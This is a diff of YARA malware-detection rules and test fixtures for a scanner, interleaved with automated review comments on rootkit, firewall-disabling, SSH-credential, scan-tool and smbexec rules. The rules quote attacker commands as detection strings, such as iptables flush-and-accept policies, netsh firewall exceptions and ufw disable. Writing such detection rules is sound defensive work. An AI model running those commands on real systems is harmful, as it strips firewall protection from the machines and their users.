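Review bot: `linux_rootkit_terms` raises a critical on any file under 10MB that contains a standalone `rootkit` next to `sshd`, `systemctl` or `miner`, with no ELF-magic gate, so anti-rootkit scanners, EDR agents and shell scripts that merely mention the word will trip it; the `filetypes = "elf,so"` meta only helps if the scanner enforces it, which this rule cannot assume. The two `readdir_*` rules moved into the same file gate on `uint32(0) == 1179403647`; doing the same here, `filesize < 10MB and uint32(0) == 1179403647 and any of ($s*) and any of ($o*)`, plus an exclusion for scanners that legitimately name rootkits (e.g. `$not_rkhunter = "rkhunter"`), would cut most of that. In `medusa_like_ld_preload`, `85 % of them` over ten strings leaves the threshold to the engine's rounding (8 or 9); `9 of them` states the intent directly. `elf_processhide`, which this hunk touches, continues past the end of the hunk.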
@@ -48,3 +48,25 @@ rule stealssh: critical { condition: filesize < 10MB and $folder and any of ($steal*) } + +rule sshd_tmp_policy: high { + meta: + description = "adjusts sshd tmp policy, possibly to dump credentials" + + strings: + $unconfined = "unconfined_u:object_r:sshd_tmp_t:s0" + + condition: + any of them +} + +rule ssh_pass_file: high { + meta: + description = "may store SSH passwords" + + strings: + $unconfined = /sshpass\w\.txt/ + + condition: + any of them +} diff --git a/rules/impact/degrade/firewall.yara b/rules/impact/degrade/firewall.yara new file mode 100644 index 000000000..ed967cae9 --- /dev/null +++ b/rules/impact/degrade/firewall.yara 
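Review bot: Neither `sshd_tmp_policy` nor `ssh_pass_file` bounds `filesize`, unlike the `stealssh` context just above which uses `filesize < 10MB`, so a single context label anywhere in an arbitrarily large file (SELinux policy dumps, `ls -Z` output captured in a log) yields a high finding; add `filesize < 10MB and` to both conditions. In `ssh_pass_file` the string is named `$unconfined` by copy-paste from the rule above — `$sshpass = /sshpass\w\.txt/` says what it matches. The description `adjusts sshd tmp policy` also overstates the evidence: the string is a file-context label, and only a surrounding `chcon`/`semanage` would show a policy change, so `references the sshd_tmp_t SELinux file context` is the accurate wording.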
@@ -0,0 +1,92 @@ +import "math" + +rule selinux_firewall: high linux { + meta: + hash_2023_Unix_Downloader_Rocke_228e = "228ec858509a928b21e88d582cb5cfaabc03f72d30f2179ef6fb232b6abdce97" + hash_2023_Unix_Downloader_Rocke_2f64 = "2f642efdf56b30c1909c44a65ec559e1643858aaea9d5f18926ee208ec6625ed" + hash_2023_Unix_Downloader_Rocke_6107 = "61075056b46d001e2e08f7e5de3fb9bfa2aabf8fb948c41c62666fd4fab1040f" + filetypes = "elf,so" + description = "references both SELinux and iptables/firewalld" + + strings: + $selinux = /SELINUX[=\w]{0,32}/ fullword + $f_iptables = /iptables[ -\w]{0,32}/ + $f_firewalld = /[\w ]{0,32}firewalld/ + $not_ip6tables = "NFTNL_RULE_TABLE" + $not_iptables = "iptables-restore" + $not_iptables_nft = "iptables-nft" + $not_selinux_init = "SELINUX_INIT" + $not_define = "#define" fullword + $not_netlink = "NETLINK" fullword + + condition: + filesize < 1MB and $selinux and any of ($f*) and none of ($not*) +} + +import "math" + +private rule ufw_tool { + strings: + $not_route = "route-insert" + $not_statusverbose = "statusverbose" + $not_enables_the = "enables the" + $not_enable_the = "enable the" + $not_enable = "ufw enable" + + condition: + filesize < 256KB and any of them +} + +rule ufw_disable_word: high { + meta: + description = "disables ufw firewall" + + strings: + $ref = /ufw['", ]{1,4}disable/ fullword + + condition: + filesize < 256KB and $ref and not ufw_tool +} + +rule iptables_disable: high { + meta: + description = "disables iptables firewall" + + strings: + $input = "iptables -P INPUT ACCEPT" + $output = "iptables -P OUTPUT ACCEPT" + $forward = "iptables -P FORWARD ACCEPT" + $flush = "iptables -F" + + condition: + filesize < 1MB and 3 of them +} + +rule netsh_firewall: high windows { + meta: + description = "adds exception to Windows netsh firewall" + + strings: + $netsh = "netsh" + $firewall = "firewall" + $firewall2 = "advfirewall" + $allowedprogram = /allowedprogram.{0,64}ENABLE/ + + condition: + $netsh and any of ($firewall*) and 
$allowedprogram +} + +rule netsh_firewall_split: high windows { + meta: + description = "adds exception to Windows netsh firewall" + + strings: + $netsh = "netsh" + $firewall = "firewall" + $firewall2 = "advfirewall" + $allowedprogram = "allowedprogram" + $ENABLE = "ENABLE" + + condition: + filesize < 5MB and $netsh and any of ($firewall*) and $allowedprogram and $ENABLE +} diff --git a/rules/impact/degrade/iptables.yara b/rules/impact/degrade/iptables.yara deleted file mode 100644 index 162b11189..000000000 --- a/rules/impact/degrade/iptables.yara +++ /dev/null @@ -1,16 +0,0 @@ -import "math" - -rule iptables_disable: high { - meta: - description = "disables iptables firewall" - - strings: - $input = "iptables -P INPUT ACCEPT" - $output = "iptables -P OUTPUT ACCEPT" - $forward = "iptables -P FORWARD ACCEPT" - $flush = "iptables -F" - - condition: - filesize < 1MB and 3 of them -} - diff --git a/rules/impact/degrade/selinux_firewall.yara b/rules/impact/degrade/selinux_firewall.yara deleted file mode 100644 index 5e86a102a..000000000 --- a/rules/impact/degrade/selinux_firewall.yara +++ /dev/null 
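Review bot: `netsh_firewall` and `netsh_firewall_split` list `$firewall2 = "advfirewall"` but make `$allowedprogram` mandatory, and `allowedprogram` is only the legacy `netsh firewall add allowedprogram ... mode=ENABLE` verb — the `advfirewall` syntax adds exceptions with `add rule name=... action=allow program=...`, so the modern form never fires and the `advfirewall` alternative is dead. Add `$add_rule = /add rule .{0,96}action=allow/` and make the condition `$netsh and any of ($firewall*) and ($allowedprogram or $add_rule)` in the first rule, with the equivalent literal pair in the split variant. `import "math"` appears twice in the new file and no rule here uses the `math` module; drop both. The other rules (`selinux_firewall`, `ufw_tool`/`ufw_disable_word`, `iptables_disable`) are moved verbatim from the deleted files.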
@@ -1,22 +0,0 @@ -rule selinux_firewall: high linux { - meta: - hash_2023_Unix_Downloader_Rocke_228e = "228ec858509a928b21e88d582cb5cfaabc03f72d30f2179ef6fb232b6abdce97" - hash_2023_Unix_Downloader_Rocke_2f64 = "2f642efdf56b30c1909c44a65ec559e1643858aaea9d5f18926ee208ec6625ed" - hash_2023_Unix_Downloader_Rocke_6107 = "61075056b46d001e2e08f7e5de3fb9bfa2aabf8fb948c41c62666fd4fab1040f" - filetypes = "elf,so" - description = "references both SELinux and iptables/firewalld" - - strings: - $selinux = /SELINUX[=\w]{0,32}/ fullword - $f_iptables = /iptables[ -\w]{0,32}/ - $f_firewalld = /[\w ]{0,32}firewalld/ - $not_ip6tables = "NFTNL_RULE_TABLE" - $not_iptables = "iptables-restore" - $not_iptables_nft = "iptables-nft" - $not_selinux_init = "SELINUX_INIT" - $not_define = "#define" fullword - $not_netlink = "NETLINK" fullword - - condition: - filesize < 1MB and $selinux and any of ($f*) and none of ($not*) -} diff --git a/rules/impact/degrade/ufw.yara b/rules/impact/degrade/ufw.yara deleted file mode 100644 index 113440907..000000000 --- a/rules/impact/degrade/ufw.yara +++ /dev/null @@ -1,24 +0,0 @@ -import "math" - -private rule ufw_tool { - strings: - $not_route = "route-insert" - $not_statusverbose = "statusverbose" - $not_enables_the = "enables the" - $not_enable_the = "enable the" - $not_enable = "ufw enable" - - condition: - filesize < 256KB and any of them -} - -rule ufw_disable_word: high { - meta: - description = "disables ufw firewall" - - strings: - $ref = /ufw['", ]{1,4}disable/ fullword - - condition: - filesize < 256KB and $ref and not ufw_tool -} diff --git a/rules/impact/rootkit/readdir-interceptor.yara b/rules/impact/rootkit/readdir-interceptor.yara deleted file mode 100644 index 63864c70a..000000000 --- a/rules/impact/rootkit/readdir-interceptor.yara +++ /dev/null 
@@ -1,65 +0,0 @@
-rule readdir_intercept: high {
- meta:
- description = "userland rootkit designed to hide files (readdir64)"
- hash_2023_lib_pkit = "8faa04955eeb6f45043003e23af39b86f1dbfaa12695e0e1a1f0bc7a15d0d116"
- hash_2023_lib_pkitarm = "67de6ba64ee94f2a686e3162f2563c77a7d78b7e0404e338a891dc38ced5bd71"
- hash_2023_lib_skit = "427b1d16f16736cf8cee43a7c54cd448ca46ac9b573614def400d2d8d998e586"
- filetypes = "so,c"
-
- strings:
- $r_new65 = "readdir64" fullword
- $r_old64 = "_readdir64"
- $r_new32 = "readdir" fullword
- $r_old32 = "_readdir"
- $not_ld_debug = "LD_DEBUG"
- $not_libc = "getusershell"
-
- condition:
- filesize < 2MB and uint32(0) == 1179403647 and all of ($r*) and none of ($not*)
-}
-
-rule readdir_tcp_wrapper_intercept: high {
- meta:
- description = "userland rootkit designed to hide files and bypass tcp-wrappers"
- ref = "https://github.com/ldpreload/Medusa"
- filetypes = "so,c"
-
- strings:
- $r_new65 = "readdir64" fullword
- $r_old64 = "_readdir64"
- $r_new32 = "readdir" fullword
- $r_old32 = "_readdir"
- $r_hosts_access = "hosts_access"
-
- condition:
- filesize < 2MB and uint32(0) == 1179403647 and all of ($r*)
-}
-
-rule readdir_intercept_source: high {
- meta:
- description = "userland rootkit source designed to hide files (DECLARE_READDIR)"
- filetypes = "so,c"
-
- strings:
- $declare = "DECLARE_READDIR"
- $hide = "hide"
-
- condition:
- filesize < 200KB and all of them
-}
-
-rule lkm_dirent: high {
- meta:
- description = "kernel rootkit designed to hide files (linux_dirent)"
- hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
- filetypes = "so"
-
- strings:
- $l_dirent = "linux_dirent"
- $linux = "Linux"
- $not_syscalls = "#define _LINUX_SYSCALLS_H"
- $not_itimer = "__kernel_old_itimerval"
-
- condition:
- filesize < 2MB and all of ($l*) and none of ($not*)
-}
diff --git a/rules/lateral/scan/scan_tool.yara b/rules/lateral/scan/scan_tool.yara
index eb3018d43..71e3b684a 100644
--- a/rules/lateral/scan/scan_tool.yara
+++ b/rules/lateral/scan/scan_tool.yara
@@ -6,7 +6,7 @@ rule generic_scan_tool: medium {
 hash_2023_Linux_Malware_Samples_00ae = "00ae07c9fe63b080181b8a6d59c6b3b6f9913938858829e5a42ab90fb72edf7a"
 strings:
- $f_gethostbyname = "gethostbyname"
+ // $f_gethostbyname = "gethostbyname"
 $f_socket = "socket"
 $f_connect = "connect"
 $o_banner = "banner"
@@ -15,6 +15,7 @@ rule generic_scan_tool: medium {
 $o_scan = "scan"
 $o_port = "port"
 $o_target = "target"
+ $o_ip = "%d.%d.%d.%d"
 $not_nss = "NSS_USE_SHEXP_IN_CERT_NAME"
 $not_microsoft = "Microsoft Corporation"
 $not_php_reference = "ftp_nb_put"
@@ -22,3 +23,15 @@ rule generic_scan_tool: medium {
 condition:
 all of ($f*) and 2 of ($o*) and none of ($not*)
 }
+
+rule root_scan_tool: high {
+ meta:
+ description = "may try to get root on other systems"
+
+ strings:
+ $root_the = /[\w \.]{0,32}root the [\w \.\%]{0,32}/
+ $r00t = /[\w \.]{0,32}r00t[\w \.]{0,32}/
+
+ condition:
+ filesize < 20MB and generic_scan_tool and any of them
+}
diff --git a/rules/malware/family/medusa.yara b/rules/malware/family/medusa.yara
index 59cae14cf..5701a3647 100644
--- a/rules/malware/family/medusa.yara
+++ b/rules/malware/family/medusa.yara
@@ -14,7 +14,8 @@ rule medusa: critical linux {
 $rkload = "rkload" fullword
 $wcs = "wcsmbsload" fullword
 $readdir64 = "readdir64" fullword
+ $backup_ld = "backup_ld" fullword
 condition:
- filesize < 2MB and 80 % of them
+ filesize < 2MB and all of them
 }
diff --git a/rules/persist/service/install.yara b/rules/persist/service/install.yara
new file mode 100644
index 000000000..cc7c79dca
--- /dev/null
+++ b/rules/persist/service/install.yara
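Review bot: Commenting out `$f_gethostbyname` leaves `generic_scan_tool` requiring only the substrings `socket` and `connect` plus two of the `$o_*` words, and the fixture updates in this same commit show the cost: clean JavaScript such as faker.js, zxcvbn.js, highlight.js and connection.js now report `lateral/scan/tool: medium`. If the resolver requirement has to go for the new coverage, tighten the other side instead, e.g. change the condition in the last hunk to `all of ($f*) and 3 of ($o*) and none of ($not*)`, or keep a resolver signal as a choice (`gethostbyname` or `getaddrinfo`) under its own prefix rather than dropping it entirely. The remaining strings and the condition of this rule sit in the later hunks of this file.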
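Review bot: `$root_the` in the new `root_scan_tool` rule begins with `[\w \.]{0,32}`, so word characters may sit directly before `root the` and phrases like `chroot the` or `reroot the` satisfy it; `$r00t` likewise accepts any token merely containing `r00t`. Because the rule escalates to `high` on `any of them` and only needs `generic_scan_tool` (loosened in the first hunk of this file) to hold, a word boundary would cut the obvious misfires: `$root_the = /\broot the [\w \.\%]{0,32}/` and `$r00t = /\br00t\b/`. If the leading capture is intentional for evidence display, `[^\w]` in place of the leading class keeps the context while still rejecting `chroot`.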
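Review bot: Switching the medusa condition from `80 % of them` to `all of them` makes this `critical` family match brittle: a sample that lacks or renames any single symbol, including the newly added `backup_ld`, now matches nothing instead of still hitting at 80%. Keep the tolerance and let the extra string simply raise the bar, e.g. `filesize < 2MB and 80% of them`, or if `backup_ld` is meant to be mandatory say so explicitly with `$backup_ld and 80% of them`. The string list above `$rkload` begins outside this hunk, so the exact count `all` now demands is not visible here.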
@@ -0,0 +1,27 @@
+rule register_service_start: windows medium {
+ meta:
+ description = "installs and starts a Windows Service"
+
+ strings:
+ $s_install = "RegisterServiceCtrlHandlerA"
+ $s_create = "CreateServiceA"
+ $s_start = "StartServiceA"
+
+ condition:
+ filesize < 5MB and all of them
+}
+
+rule register_service_start_high: windows high {
+ meta:
+ description = "installs and starts a Windows Service"
+
+ strings:
+ $s_install = "RegisterServiceCtrlHandlerA"
+ $s_create = "CreateServiceA"
+ $s_start = "StartServiceA"
+ $o_netsh = "netsh"
+ $o_filter = "SetUnhandledExceptionFilter"
+
+ condition:
+ filesize < 200KB and all of ($s*) and any of ($o*)
+}
diff --git a/rules/process/thread_local_storage.yara b/rules/process/thread_local_storage.yara
index 493a44223..68f190e9e 100644
--- a/rules/process/thread_local_storage.yara
+++ b/rules/process/thread_local_storage.yara
@@ -1,6 +1,6 @@
-rule tls_get_addr {
+rule tls_get_addr: medium {
 meta:
- description = "Uses glibc thread local storage"
+ description = "looks up memory addresses for thread local storage or linked libraries"
 ref = "https://chao-tic.github.io/blog/2018/12/25/tls"
 strings:
diff --git a/rules/sec-tool/pentest/smbexec.yara b/rules/sec-tool/pentest/smbexec.yara
new file mode 100644
index 000000000..94a829082
--- /dev/null
+++ b/rules/sec-tool/pentest/smbexec.yara
@@ -0,0 +1,11 @@
+rule hacktool_smbexec: critical {
+ meta:
+ description = "execute commands on remote SMB host"
+
+ strings:
+ $hash = "user supplied NTLM HASH"
+ $hash2 = "HASH PASS: Substituting"
+
+ condition:
+ filesize < 100KB and any of them
+}
diff --git a/tests/does-nothing/does-nothing.simple b/tests/does-nothing/does-nothing.simple
index af4355d54..37c6379a5 100644
--- a/tests/does-nothing/does-nothing.simple
+++ b/tests/does-nothing/does-nothing.simple
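Review bot: Both new rules match only the ANSI imports (`RegisterServiceCtrlHandlerA`, `CreateServiceA`, `StartServiceA`), so a service installer built with `UNICODE` defined, which imports the `W` variants, or one using `RegisterServiceCtrlHandlerEx`, is not covered at all. Drop the suffix into a class so either variant hits: `$s_install = /RegisterServiceCtrlHandler(Ex)?[AW]/`, `$s_create = /CreateService[AW]/`, `$s_start = /StartService[AW]/`. In `register_service_start_high`, `$o_filter = "SetUnhandledExceptionFilter"` is part of the CRT startup of practically every MSVC-linked executable, so `any of ($o*)` will almost always be satisfied and the `high` rule reduces to "any small binary that installs a service"; requiring `$o_netsh` on its own, or a less ubiquitous second signal, would keep the severity step meaningful. The two rules also carry the identical description, so the `high` one should state what distinguishes it, e.g. `installs and starts a Windows Service and invokes netsh`.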
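Review bot: `hacktool_smbexec` escalates to `critical` on `any of them`, and `$hash = "user supplied NTLM HASH"` by itself is a generic pass-the-hash help message that other tooling or documentation can carry; only `$hash2 = "HASH PASS: Substituting"` reads as tool-specific. Either require both with `filesize < 100KB and all of them`, or add a third string that is unique to smbexec before keying a critical verdict on a single phrase. Unlike the neighbouring rules, this one also has no `ref` meta or `filetypes` entry, so a future maintainer cannot tell which upstream tool's output these strings were lifted from; record the project the strings come from in `ref` so the rule stays auditable.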
@@ -13,6 +13,7 @@ fs/path/etc: low fs/path/home: medium fs/permission/chown: medium fs/permission/modify: medium +lateral/scan/tool: medium net/socket/receive: low net/socket/send: low persist/daemon: medium diff --git a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff index 50a5439c3..35179e6ff 100644 --- a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff +++ b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff 
@@ -1,6 +1,6 @@ ## Changed: javascript/2024.lottie-player/lottie-player.min.js [🟡 MEDIUM → 😈 CRITICAL] -### 39 new behaviors +### 40 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | |-----------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| @@ -21,6 +21,7 @@ | +MEDIUM | **[impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent)** | references an 'agent' | [useragent](https://github.com/search?q=useragent&type=code) | | +MEDIUM | **[impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat)** | references a 'heartbeat' | [heartBeatTimeout](https://github.com/search?q=heartBeatTimeout&type=code)
[heartbeat_pulse](https://github.com/search?q=heartbeat_pulse&type=code)
[lastHeartbeatResponse](https://github.com/search?q=lastHeartbeatResponse&type=code)
[updateLastHeartbeat](https://github.com/search?q=updateLastHeartbeat&type=code) | | +MEDIUM | **[impact/resource/bank_xfer](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/resource/bank_xfer.yara#bank_xfer)** | references 'bank transfer' | [bank transfer](https://github.com/search?q=bank+transfer&type=code) | +| +MEDIUM | **[lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool)** | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | +MEDIUM | **[net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload)** | upload content via HTTP form | [POST](https://github.com/search?q=POST&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code) | | +MEDIUM | **[net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post)** | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | +MEDIUM | **[net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket)** | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [WalletLinkWebSocket](https://github.com/search?q=WalletLinkWebSocket&type=code)
[WebSocket:gV](https://github.com/search?q=WebSocket%3AgV&type=code)
[WebSocket:typeof](https://github.com/search?q=WebSocket%3Atypeof&type=code)
[WebSocketClass:h](https://github.com/search?q=WebSocketClass%3Ah&type=code)
[WebSocketClass:l](https://github.com/search?q=WebSocketClass%3Al&type=code)
[clearWebSocket](https://github.com/search?q=clearWebSocket&type=code)
[webSocket:e](https://github.com/search?q=webSocket%3Ae&type=code)
[webSocket:r](https://github.com/search?q=webSocket%3Ar&type=code)
[webSocket:t](https://github.com/search?q=webSocket%3At&type=code) | diff --git a/tests/javascript/clean/203.b7219352.chunk.js.simple b/tests/javascript/clean/203.b7219352.chunk.js.simple index 0e5568b9b..a306dedb0 100644 --- a/tests/javascript/clean/203.b7219352.chunk.js.simple +++ b/tests/javascript/clean/203.b7219352.chunk.js.simple @@ -36,6 +36,7 @@ hw/wireless: low impact/degrade/infection: medium impact/remote_access/agent: medium impact/remote_access/heartbeat: medium +lateral/scan/tool: medium net/dns/txt: low net/download: medium net/http/cookies: medium diff --git a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple index c7776083d..f68825144 100644 --- a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple +++ b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple @@ -27,7 +27,7 @@ discover/system/platform: low discover/user/HOME: low discover/user/USER: low discover/user/name_get: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low exec/cmd: medium exec/conditional/LANG: low diff --git a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple index 855e2c16f..842e48d3e 100644 --- a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple +++ b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple @@ -28,7 +28,7 @@ discover/system/platform: low discover/user/HOME: low discover/user/USER: low discover/user/name_get: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low exec/cmd: medium exec/plugin: low diff --git a/tests/javascript/clean/connection.js.simple b/tests/javascript/clean/connection.js.simple index 04a5d5256..76dcc4f27 100644 --- a/tests/javascript/clean/connection.js.simple 
+++ b/tests/javascript/clean/connection.js.simple @@ -6,6 +6,7 @@ credential/password: low data/embedded/base64_terms: medium data/embedded/base64_url: medium data/encoding/base64: low +lateral/scan/tool: medium net/dns: low net/socket/send: low net/url/embedded: medium diff --git a/tests/javascript/clean/faker.js.simple b/tests/javascript/clean/faker.js.simple index bb8797a29..a5474ab76 100644 --- a/tests/javascript/clean/faker.js.simple +++ b/tests/javascript/clean/faker.js.simple @@ -14,7 +14,7 @@ data/embedded/base64_url: medium data/encoding/base64: low data/encoding/json_decode: low data/encoding/json_encode: low -evasion/hidden_paths/x11: low +evasion/file/location/tmp_x11_unix: low exec/plugin: low exfil/office_file_ext: medium exfil/stealer/credit_card: medium @@ -26,6 +26,7 @@ fs/path/usr_local: medium fs/path/var: low impact/infection/worm: medium impact/remote_access/trojan: medium +lateral/scan/tool: medium net/download: medium net/http/fake_user_agent: high net/http/form_upload: medium diff --git a/tests/javascript/clean/faker.min.js.simple b/tests/javascript/clean/faker.min.js.simple index 87efb6b7e..d16220b08 100644 --- a/tests/javascript/clean/faker.min.js.simple +++ b/tests/javascript/clean/faker.min.js.simple @@ -9,7 +9,7 @@ data/compression/bzip2: low data/compression/gzip: low data/encoding/json_decode: low data/encoding/json_encode: low -evasion/hidden_paths/x11: low +evasion/file/location/tmp_x11_unix: low exec/plugin: low exfil/office_file_ext: medium exfil/stealer/credit_card: medium @@ -21,6 +21,7 @@ fs/path/usr_local: medium fs/path/var: low impact/infection/worm: medium impact/remote_access/trojan: medium +lateral/scan/tool: medium net/download: medium net/http/fake_user_agent: high net/http/form_upload: medium diff --git a/tests/javascript/clean/frequency_lists.js.simple b/tests/javascript/clean/frequency_lists.js.simple index c3fd38930..6f90669ac 100644 --- a/tests/javascript/clean/frequency_lists.js.simple 
+++ b/tests/javascript/clean/frequency_lists.js.simple @@ -17,6 +17,7 @@ impact/remote_access/agent: medium impact/remote_access/heartbeat: medium impact/remote_access/implant: medium impact/remote_access/trojan: medium +lateral/scan/tool: medium net/download: medium net/ip/multicast_send: low net/ip/spoof: medium diff --git a/tests/javascript/clean/highlight.esm.js.simple b/tests/javascript/clean/highlight.esm.js.simple index 698fc579b..253491788 100644 --- a/tests/javascript/clean/highlight.esm.js.simple +++ b/tests/javascript/clean/highlight.esm.js.simple @@ -20,10 +20,10 @@ discover/system/sysinfo: medium discover/user/HOME: low discover/user/USER: low discover/user/name_get: low -evasion/hidden_paths/relative_hidden: low exec/cmd: medium exec/plugin: low exec/program/background: low +exec/program/hidden: low exec/remote_commands/code_eval: medium exec/script/osa: medium exec/shell/SHELL: low diff --git a/tests/javascript/clean/highlight.js.simple b/tests/javascript/clean/highlight.js.simple index f2585167d..9e9e58262 100644 --- a/tests/javascript/clean/highlight.js.simple +++ b/tests/javascript/clean/highlight.js.simple @@ -20,10 +20,10 @@ discover/system/sysinfo: medium discover/user/HOME: low discover/user/USER: low discover/user/name_get: low -evasion/hidden_paths/relative_hidden: low exec/cmd: medium exec/plugin: low exec/program/background: low +exec/program/hidden: low exec/remote_commands/code_eval: medium exec/script/osa: medium exec/shell/SHELL: low diff --git a/tests/javascript/clean/mode-php.js.simple b/tests/javascript/clean/mode-php.js.simple index f70f60b70..0d3f79a79 100644 --- a/tests/javascript/clean/mode-php.js.simple +++ b/tests/javascript/clean/mode-php.js.simple @@ -15,7 +15,7 @@ discover/system/hostname_get: low discover/system/platform: low discover/user/USER: low discover/user/name_get: low -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low exec/plugin: low exec/program: medium 
